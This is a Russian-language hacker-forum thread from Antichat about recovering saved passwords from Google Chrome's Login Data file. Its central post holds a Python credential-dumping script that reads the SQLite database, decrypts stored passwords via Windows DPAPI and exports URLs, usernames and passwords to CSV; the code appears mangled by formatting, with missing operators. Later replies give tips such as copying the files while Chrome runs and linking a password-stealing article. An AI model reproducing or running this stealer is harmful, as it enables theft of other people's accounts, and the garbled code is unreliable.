Можно ли узнать пароли Chrome имея доступ к файлам?

Discussion in 'Песочница' started by BOSS, 8 Nov 2016.

  1. BOSS

    BOSS Member

    Joined:
    15 Jun 2010
    Messages:
    86
    Likes Received:
    5
    Reputations:
    0
    Где-то вычитал, что файлы от Google Chrome хранятся в файле Login Data, который находится здесь:
    AppData\Local\Google\Chrome\User Data\Default
    Может ли человек заменить эти файлы у себя на ПК и увидеть мои пароли в настройках Chrome?
     
    #1 BOSS, 8 Nov 2016
  2. Troy Silvani

    Troy Silvani New Member

    Joined:
    13 Nov 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    меня тоже мучает этот вопрос, а если быть конкретнее - ВОЗМОЖНО ЛИ РАСШИФРОВАТЬ СТРОКУ ПАРОЛЯ ИЛИ BLOB значение ??? Судя по статье хабра ,эта строка заширована в битах...если так ,то есть исходник для расшифровки битов с БД SQL3 типа. ...это для меня уже дело принципа...в одном месте пишут что возможно ...в другом что не возможно....ХОЧЕТСЯ ИСТИНЫ!!)
     
    #2 Troy Silvani, 17 Nov 2016
  3. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Истина в том, что ВОЗМОЖНО.
     
    #3 YaBtr, 18 Nov 2016
    Turanchocks_ likes this.
  4. Turanchocks_

    Turanchocks_ Elder - Старейшина

    Joined:
    11 May 2013
    Messages:
    1,327
    Likes Received:
    3,285
    Reputations:
    17
    1st: "No system is safe";)
    2nd: "Aim for the impossible":mad:
    3rd: "Have fun in cyberspace and meatspace":cool:
     
    #4 Turanchocks_, 18 Nov 2016
  5. Troy Silvani

    Troy Silvani New Member

    Joined:
    13 Nov 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    подскажи как??? дай хоть какую нибудь зацепку для дальнейшего поиска моего ...или утилиту ..вообще было б огненно)
     
    #5 Troy Silvani, 11 Dec 2016
  6. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    вот скриптик, только хром должен быть закрытым для его работы:
    PHP:
    #gets saved passwords from Chrome
    #need to get Pywin32 python extension for this to work

    import os
    from sys import     exit
    import sqlite3
    from win32crypt import CryptUnprotectData
    import argparse

    def chromepath    ():
            PathName os.getenv('localappdata') + '\\Google\\Chrome\\User Data\\Default\\'
            if (os.path.isdir(PathName) == False):
            print(    'Chrome not found')
                #exit(0)
            return PathName 

    def main    ():
            secret = []
            path chromepath()
            #path = "C:\\Users\\XXX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\"
            try:
                connection sqlite3.connect(path "Login Data")
                #connection = sqlite3.connect("C:\\Users\\XXX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" + "Login Data")
           
                with connection:
                    cursor connection.cursor()
                    cursor.execute('SELECT action_url, username_value, password_value FROM logins')
               
                    value v.fetchall()
               

            for     i in value:
                    password CryptUnprotectData(i[2], NoneNoneNone0)[1]
                   
                if     password:
                        secret.append({
                            'url'i[0],
                            'username'i[1],
                            'password'str(password)
                    })
                       
            except sqlite3.OperationalError as e:
                if (    str(e) == 'database is locked'):
                    print(    'Google Chrome can\'t be running at the same time')
                    exit(    0)
                    elif (str(e) == 'no such table: logins'):
                    print(    'Could not find database name')
                    exit(    0)
                    elif (str(e) == 'unable to open database file'):
                    print(    'Could not find database path')
                    exit(    0)
                else:
                    print(    e)
                    exit(    0)
        if     secret == []:
            print(    'no passwords saved in Chrome')
        else:         
            return     secret         

    def csv    (info):
            with open('chromepasswordlist.csv''wb') as result:
                result.write('url,username,password \n'.encode('utf-8'))
            for     data in info:
                    result.write(('%s, %s, %s \n' % (data['url'], data['username'], data['password'])).encode('utf-8'))

    def args_parser():
            parser argparse.ArgumentParser(description="gets Chrome saved passwords")
            parser.add_argument("-csv"help="Output to csv"action="store_true")
            args parser.parse_args()
        if     args.csv:
                csv(main())
        else:
            for     data in main():
                print(    data)
                print(    password)

    if     __name__ == '__main__':
            args_parser()
    там в соседних файлах и хистори можете посмотреть, аналогичная ситуация с оперой, с фаером не разбирался....
     
    _________________________
    #6 winstrool, 11 Dec 2016
    binarymaster and Troy Silvani like this.
  7. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    #7 WallHack, 17 Dec 2016
  8. Troy Silvani

    Troy Silvani New Member

    Joined:
    13 Nov 2016
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    спасибо друг, через какую прогу ее реализовать надо? borland не распознает команды
     
    #8 Troy Silvani, 30 Jan 2017
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    через питон, прицепи алгоритм переписать можно на любом языке....
     
    _________________________
    #9 winstrool, 30 Jan 2017
  10. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    https://codeby.net/forum/threads/voruem-paroli-iz-google-chrome.58962/ - вот глянь статейку мою, гугл необязательно должен быть закрыт. Идея в том что протокол DPAPI который использует гугл для шифрования может расшифрован только на той машине на которой они были зашифрованы. Код там целый. Но как замечено переписать на чем угодно можно.
     
    _________________________
    #10 SooLFaa, 30 Jan 2017
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Насколько я понимаю, эти файлы можно скопировать в другое место, даже при запущенном хроме. И после натравить скрипт на копии файлов.
     
    #11 binarymaster, 30 Jan 2017
(You must log in or sign up to post here.)
Loading...
Similar Threads - узнать пароли Chrome
  1. Loents

    Сокращение размера файла паролей

    Loents, 7 Jan 2023, in forum: Песочница
    Replies:
    14
    Views:
    2,642
    lifescore
    13 Jan 2023
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.